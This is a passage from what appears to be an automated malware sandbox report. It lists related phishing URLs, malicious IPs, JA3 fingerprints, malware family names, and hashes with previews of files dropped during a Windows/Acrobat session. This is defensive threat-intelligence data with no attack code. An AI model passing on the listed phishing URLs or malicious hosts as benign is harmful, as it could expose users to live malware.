	https://url7304.disco-mailer.net/ls/click?upn=u001.DWLeRfOXStcSaUNphm6ZnGquuezyvOF0FIuLMCSCrIQ9t3e8n3fjexKHJjVTV-2BQUFT1dnxR3BcyXaxz-2BblhjX71zswvTIlAGm31luuFhJgeOGXb3dn9Itq74-2Fe-2BlKg-2Bs0-2F4odRns7kSdvfqBhyqSbrYsnPmx4SeDwlRdlhHbM3UucitnipcwJ1gR7h8DzOIUWsvEslHUA8FsNTNWtsq3Q-2FU-2FPeBtGbo-2Fx3kgcXxAZuE-3DPmkq_5KlZmZKASPtIpYbHU6HHQmxS-2FHe3g010GX01BBBmlalJnMdBClXoEYQADKPWInqgHw-2B5921oa-2Fum9DxIHV8wgOarlsOnYJwzp6I2lNDfeCQdFcL55956QetBM0U9iihLLCXzc7MWVFcQDUwnaU8PUgQFrTwK63nQhJu8ngVllYSJR-2BUamfX7Ej8Gpp4vMWsL8t65JTtpjdFVQ36IgP-2B2LxLYSj9SfdmLAt97TCVXHWn7xANKqYpl-2BYx09SetkszDOjJuUV9L9bqZ-2FbmClOsUrPLylG74RJ8zQAREr7-2BUktmlWKoc8C7oqqTOKv340mZnTc-2FztCVjFgPMm1Bz5lR5AptUVEvvSBboXVGluKKoNkkMFkS-2BmNybyD3Aa-2BX8UZ5s	Get hash	malicious	HTMLPhisher	Browse	37.252.15.57
	https://onpagvus.store	Get hash	malicious	HTMLPhisher	Browse	5.61.52.174
	O8gVyF6MY1.exe	Get hash	malicious	Unknown	Browse	37.1.201.146
	oniCmGMx16.exe	Get hash	malicious	Unknown	Browse	37.1.201.146

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Xmrig	Browse	108.181.61.49 37.1.223.28
	Payment_Failure_Notice_Office365_sdf_[13019].html	Get hash	malicious	HTMLPhisher	Browse	108.181.61.49 37.1.223.28
	R4qP4YM0QX.lnk	Get hash	malicious	Unknown	Browse	108.181.61.49 37.1.223.28
	List of required items and services.pdf.vbs	Get hash	malicious	GuLoader, RHADAMANTHYS	Browse	108.181.61.49 37.1.223.28
	g8ix97hz.vbs	Get hash	malicious	GuLoader, RHADAMANTHYS	Browse	108.181.61.49 37.1.223.28
	http://duckduckgogg42xjoc72x3sjasowoarfbgcmvfimaftt6twagswzczad.onion	Get hash	malicious	Unknown	Browse	108.181.61.49 37.1.223.28
	_Company.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	108.181.61.49 37.1.223.28
	1734537007a22115ccf81804870f6743791426a5c4263cfc792e757756373d12e0d21d0600610.dat-decoded.exe	Get hash	malicious	AsyncRAT	Browse	108.181.61.49 37.1.223.28
	F.O Pump Istek,Docx.bat	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger	Browse	108.181.61.49 37.1.223.28

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Windows\Tasks\winver.exe	bI2i1g3RLM.exe	Get hash	malicious	Unknown	Browse
	bI2i1g3RLM.exe	Get hash	malicious	Unknown	Browse
	p1qr388Lap.exe	Get hash	malicious	Unknown	Browse
	Install.msi	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	1.3073668930461615
Encrypted:	false
SSDEEP:	3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrD:KooCEYhgYEL0In
MD5:	CA81D706236B36AEEED02004C39AE66F
SHA1:	D18B419F0ADA9AE89763AD34539DC1E8BECF07B9
SHA-256:	D094FDBFB6FF3C594EA4ACF3C7E775A76E50118573FBF3F89BDFD87ED03AACB5
SHA-512:	A916E02E66997B3115330641F11623AC2BEA4B2F5F9B752C3A230F70923442B0A6BE736AE69471BC4C9F7B83277393E57CE18F93ED9517D0E88D12AD01FAE62C
Malicious:	false
Reputation:	low
Preview:	z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x10f44f81, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.4221888413723892
Encrypted:	false
SSDEEP:	1536:BSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Baza/vMUM2Uvz7DO
MD5:	C691E330604BFE6A8F3151B3B36DCF30
SHA1:	DE9AAF8A0103D10A770EB29194B66466FDB547D0
SHA-256:	93DCFDB8DAFC6275C849A46D1151150AF3DC583070BC8AF5FBD9011C271B42AE
SHA-512:	F1DB7043C5B2ADDAA0CBB80BC961F8E84D01F94412FE00637DCA3DB2FE6E2E926080322244C42254C553CE610C8B198EE59D0BF24FDB15C6359B8498AD88D7E8
Malicious:	false
Preview:	..O.... .......A.......X\...;...{......................0.!..........{A......\|..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{..................................O*.3.....\|...........................\|...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.07659551311002949
Encrypted:	false
SSDEEP:	3:rYeeP385Cjn13a/wE/0tollcVO/lnlZMxZNQl:rzi38k53qwEJOewk
MD5:	23452617C6F6483BC389087923734701
SHA1:	B81B843F0B470D611028B742941B7F34FF1D1FB9
SHA-256:	463288C8951BC979AF05592AF3E5A7436A9E9F5BF7EF9A797FA5CC6E421DD53C
SHA-512:	C540B4A978C36AB21661DE90FAB0E0C258CC419FE226B23BF035C80B024D23220005419E62DDF9A560211DA0CECE908F97F6996A1310D480FA163FC551FED31F
Malicious:	false
Preview:	)].......................................;...{.......\|.......{A..............{A......{A..........{A].........................\|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	292
Entropy (8bit):	5.144544590427757
Encrypted:	false
SSDEEP:	6:7PS9lAvIq2Pwkn2nKuAl9OmbnIFUt8OPS98Zmw+OPS98kwOwkn2nKuAl9OmbjLJ:7clAvIvYfHAahFUt8Oc8/+Oc85JfHAae
MD5:	FCC1D75BC33B97B89011E8943237FE2D
SHA1:	EF2A54ED6E32BE919FA916E5257235B9285E73DE
SHA-256:	820A7FCAC8F2636878108A643E41BE0AA2684AC182FCE38184F7C9F50A736D3D
SHA-512:	902CBEF27EEB4A1379BAAD56B01FDC7CE4A5727C9141C430A6EDA0E7070A5D5F6902C197023E463A87D65F61F7ADB873046978CC73A47E8BEC618CA64B798E73
Malicious:	false
Preview:	2024/12/18-17:06:11.712 1ee0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/18-17:06:11.714 1ee0 Recovering log #3.2024/12/18-17:06:11.714 1ee0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	292
Entropy (8bit):	5.144544590427757
Encrypted:	false
SSDEEP:	6:7PS9lAvIq2Pwkn2nKuAl9OmbnIFUt8OPS98Zmw+OPS98kwOwkn2nKuAl9OmbjLJ:7clAvIvYfHAahFUt8Oc8/+Oc85JfHAae
MD5:	FCC1D75BC33B97B89011E8943237FE2D
SHA1:	EF2A54ED6E32BE919FA916E5257235B9285E73DE
SHA-256:	820A7FCAC8F2636878108A643E41BE0AA2684AC182FCE38184F7C9F50A736D3D
SHA-512:	902CBEF27EEB4A1379BAAD56B01FDC7CE4A5727C9141C430A6EDA0E7070A5D5F6902C197023E463A87D65F61F7ADB873046978CC73A47E8BEC618CA64B798E73
Malicious:	false
Preview:	2024/12/18-17:06:11.712 1ee0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/18-17:06:11.714 1ee0 Recovering log #3.2024/12/18-17:06:11.714 1ee0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	336
Entropy (8bit):	5.212038584273937
Encrypted:	false
SSDEEP:	6:7PS9jWq2Pwkn2nKuAl9Ombzo2jMGIFUt8OPS9hZmw+OPS97kwOwkn2nKuAl9OmbX:7cyvYfHAa8uFUt8Och/+Oc75JfHAa8RJ
MD5:	9FA0708CBF5477D56637F363DB9C3DBF
SHA1:	C32B5B54B1905931830B2359B0608F3D89C6E316
SHA-256:	CA67C5A8C9B9BD7696A9BB65642462885342D77C9036F29776CFC00AC66F610F
SHA-512:	2495622BCC2ACC24F3B8276731EEFD0EEA35BFDE7EF52274AD4D3EA8D2494CAF93372DE226252F1392296F870816D42D02CFA3E0CF356B41908306031588C2D3
Malicious:	false
Preview:	2024/12/18-17:06:11.861 1fb4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/18-17:06:11.926 1fb4 Recovering log #3.2024/12/18-17:06:11.926 1fb4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	336
Entropy (8bit):	5.212038584273937
Encrypted:	false
SSDEEP:	6:7PS9jWq2Pwkn2nKuAl9Ombzo2jMGIFUt8OPS9hZmw+OPS97kwOwkn2nKuAl9OmbX:7cyvYfHAa8uFUt8Och/+Oc75JfHAa8RJ
MD5:	9FA0708CBF5477D56637F363DB9C3DBF
SHA1:	C32B5B54B1905931830B2359B0608F3D89C6E316
SHA-256:	CA67C5A8C9B9BD7696A9BB65642462885342D77C9036F29776CFC00AC66F610F
SHA-512:	2495622BCC2ACC24F3B8276731EEFD0EEA35BFDE7EF52274AD4D3EA8D2494CAF93372DE226252F1392296F870816D42D02CFA3E0CF356B41908306031588C2D3
Malicious:	false
Preview:	2024/12/18-17:06:11.861 1fb4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/18-17:06:11.926 1fb4 Recovering log #3.2024/12/18-17:06:11.926 1fb4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\11653a9b-b505-4648-8b97-06b12a387d86.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	475
Entropy (8bit):	4.967403857886107
Encrypted:	false
SSDEEP:	12:YH/um3RA8sqLsBdOg2HHfcaq3QYiubInP7E4TX:Y2sRdsVdMHO3QYhbG7n7
MD5:	B7761633048D74E3C02F61AD04E00147
SHA1:	72A2D446DF757BAEA2C7A58C050925976E4C9372
SHA-256:	1A468796D744FCA806D1F828C07E0064AB6A1FA0E31DA3A403F12B9B89868B67
SHA-512:	397A10C510FAA048E4AAB08A11B2AE14A09EE47EC4F5A2B47CE1A9580C2874ADE0F9F8FC287B9358C0FFEA4C89F8AB9270B9CA00064EA90CD2EF0EAD0A59369F
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340980889952523","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146406},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\736a8801-16b3-41fa-8be2-f7aa9af79651.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	JSON data
Category:	modified
Size (bytes):	475
Entropy (8bit):	4.971105805422558
Encrypted:	false
SSDEEP:	12:YH/um3RA8sqI9sBdOg2HxOcaq3QYiubInP7E4TX:Y2sRds8dMHxx3QYhbG7n7
MD5:	CBFA2A53D9673AEAF7B1A4FB65732C47
SHA1:	2240660D9A779A4A9E8EEA785DEA31F025FFB93F
SHA-256:	B8F614D1B54B44D3E105E894B37211D35719F6DDAB703D26A70BCA202307C0CA
SHA-512:	EE75C56481573FB79C424A677C108C7D93AEE84316EFD7B95EBF131DDDF5D9D67C8C4D708DE82E8579BD97459AC84A5E3E3D24CBA1D12329F9CD9CBCDD4B208B
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379119580545755","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":599063},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	475
Entropy (8bit):	4.967403857886107
Encrypted:	false
SSDEEP:	12:YH/um3RA8sqLsBdOg2HHfcaq3QYiubInP7E4TX:Y2sRdsVdMHO3QYhbG7n7
MD5:	B7761633048D74E3C02F61AD04E00147
SHA1:	72A2D446DF757BAEA2C7A58C050925976E4C9372
SHA-256:	1A468796D744FCA806D1F828C07E0064AB6A1FA0E31DA3A403F12B9B89868B67
SHA-512:	397A10C510FAA048E4AAB08A11B2AE14A09EE47EC4F5A2B47CE1A9580C2874ADE0F9F8FC287B9358C0FFEA4C89F8AB9270B9CA00064EA90CD2EF0EAD0A59369F
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340980889952523","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146406},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State~RF506a1e.TMP (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	475
Entropy (8bit):	4.967403857886107
Encrypted:	false
SSDEEP:	12:YH/um3RA8sqLsBdOg2HHfcaq3QYiubInP7E4TX:Y2sRdsVdMHO3QYhbG7n7
MD5:	B7761633048D74E3C02F61AD04E00147
SHA1:	72A2D446DF757BAEA2C7A58C050925976E4C9372
SHA-256:	1A468796D744FCA806D1F828C07E0064AB6A1FA0E31DA3A403F12B9B89868B67
SHA-512:	397A10C510FAA048E4AAB08A11B2AE14A09EE47EC4F5A2B47CE1A9580C2874ADE0F9F8FC287B9358C0FFEA4C89F8AB9270B9CA00064EA90CD2EF0EAD0A59369F
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340980889952523","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146406},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	4320
Entropy (8bit):	5.2582598296595355
Encrypted:	false
SSDEEP:	96:etJCV4FAsszrNamjTN/2rjYMta02fDtehgO7BtTgo7gM3KF:etJCV4FiN/jTN/2r8Mta02fEhgO73go+
MD5:	751EF2021C95BAE6A1BD73EA6A5FD518
SHA1:	7B667E6753303450A8A891DDF5382CCA3E5B3E15
SHA-256:	1EC54EB9BD47E5468CD53C86FA9F28594B6FCDA4684ABA8E2D76721A35DA09AB
SHA-512:	C64C4612379F7D0C6A80B560B2F447057A72DBFE3DB056D9403FB99E22E79DB017E8E72B823E36C81975FC895ECED986B47ABCCFB09FB85DD8379A07D7FF135A
Malicious:	false
Preview:	*...#................version.1..namespace-['O.o................next-map-id.1.Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/.0>...r................next-map-id.2.Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/.1O..r................next-map-id.3.Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/.2.\.o................next-map-id.4.Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/.3....^...............Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/..\|.^...............Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/n..Fa...............Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/DQ..a...............Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/i.`do................next-map-id.5.Pnamespace-de635bf2_6773_4d83_ad16_

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.197644434374259
Encrypted:	false
SSDEEP:	6:7PS96Tq2Pwkn2nKuAl9OmbzNMxIFUt8OPS96bZmw+OPS96GvkwOwkn2nKuAl9Omk:7c6TvYfHAa8jFUt8Oc6b/+Oc6o5JfHAo
MD5:	440DC7CA0DC817E426496C9CA178F702
SHA1:	7D8954E47EFF1E1E805CBA630EF18E8E44619410
SHA-256:	47F6722A661732D3E67852EFAE8C9F246FCE858BAB1D87E7C18831E61525C90D
SHA-512:	34C3A6DCCEEA432D268A15D7AEE9DF187F51A10E8C67B03BBCF3DBE65F12F688AC38B0356821B2DEC94F38133F619DD54FA5FDC7CACB914A683435F57051BDFB
Malicious:	false
Preview:	2024/12/18-17:06:12.107 1fb4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/18-17:06:12.108 1fb4 Recovering log #3.2024/12/18-17:06:12.109 1fb4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.197644434374259
Encrypted:	false
SSDEEP:	6:7PS96Tq2Pwkn2nKuAl9OmbzNMxIFUt8OPS96bZmw+OPS96GvkwOwkn2nKuAl9Omk:7c6TvYfHAa8jFUt8Oc6b/+Oc6o5JfHAo
MD5:	440DC7CA0DC817E426496C9CA178F702
SHA1:	7D8954E47EFF1E1E805CBA630EF18E8E44619410
SHA-256:	47F6722A661732D3E67852EFAE8C9F246FCE858BAB1D87E7C18831E61525C90D
SHA-512:	34C3A6DCCEEA432D268A15D7AEE9DF187F51A10E8C67B03BBCF3DBE65F12F688AC38B0356821B2DEC94F38133F619DD54FA5FDC7CACB914A683435F57051BDFB
Malicious:	false
Preview:	2024/12/18-17:06:12.107 1fb4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/18-17:06:12.108 1fb4 Recovering log #3.2024/12/18-17:06:12.109 1fb4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
Category:	dropped
Size (bytes):	86016
Entropy (8bit):	4.44462371331512
Encrypted:	false
SSDEEP:	384:yezci5triBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:ros3OazzU89UTTgUL
MD5:	6469E789F77258A8500E3E72A4369507
SHA1:	B895561C07B43A7E321BC628811A858CA2318B48
SHA-256:	F69AA5A3EE66740A3C9141CC98DB2845CF8513C82457A25559433B3FA749C7C1
SHA-512:	C82174ADF4460CD0BD21C97EF80C0641E42DE7811FF72DBF74BB665C125FB6760D1D342BA2B26C34F712DBD995FCC4ABE539C8E856D4C36CE975804E49A22C93
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite Rollback Journal
Category:	dropped
Size (bytes):	8720
Entropy (8bit):	3.767963643286444
Encrypted:	false
SSDEEP:	48:7MYcpA2ioyVdDioyBhoWoy1Cwoy1CwKOioy1noy1AYoy1Wioy11ioyeioyBoy1nm:7ZcpfudrUX2jigb9IVXEBodRBkF
MD5:	DBAE3934959E59B269F7C979C800D994
SHA1:	AF5A604C3D1B992D220310AA90767330DA108B8B
SHA-256:	12FFB5C3EDF3A1123A4B340CFCE4D2B75C178154D55BACED6D4F3EB9142EBC43
SHA-512:	9AB544BE85F8383B8F121BA12476B1CB96493004E263A5A95C0B299A93EAB2FE2BE1B9C244CE058DA2DEEB7EBBA7F31307AB47A1F364BEDBC9D7EC5F100DE8B6
Malicious:	false
Preview:	.... .c.....e.E................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b...r...t...}.....L..............................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	Certificate, Version=3
Category:	dropped
Size (bytes):	1391
Entropy (8bit):	7.705940075877404
Encrypted:	false
SSDEEP:	24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
MD5:	0CD2F9E0DA1773E9ED864DA5E370E74E
SHA1:	CABD2A79A1076A31F21D253635CB039D4329A5E8
SHA-256:	96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
SHA-512:	3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
Malicious:	false
Preview:	0..k0..S............@.YDc.c...0....H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0....H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.\|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I......A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.\|C.t..t.....0.[q6....00\H..;..}`...).........A.......\|.;F.H..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..\|o..;.....'...}~.."......

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	71954
Entropy (8bit):	7.996617769952133
Encrypted:	true
SSDEEP:	1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
MD5:	49AEBF8CBD62D92AC215B2923FB1B9F5
SHA1:	1723BE06719828DDA65AD804298D0431F6AFF976
SHA-256:	B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
SHA-512:	BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
Malicious:	false
Preview:	MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..\|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........\|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.\|.c.&>?..^t. ..;..X.d.E.0G....[Q.,......#.Dp..L.o\|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	192
Entropy (8bit):	2.7569015731729736
Encrypted:	false
SSDEEP:	3:kkFklut380bVXfllXlE/HT8kieNNX8RolJuRdxLlGB9lQRYwpDdt:kK3mT8yNMa8RdWBwRd
MD5:	DA2ED67BB06EE7CFB5C7F231F186390C
SHA1:	83AC0A6F9A14FF288F9BF5F3ED513929D5973505
SHA-256:	53CE0282312B3B535D8E834DCB4AC92A1CDA25DE0F2DFD21959CCA41E0D5AC8F
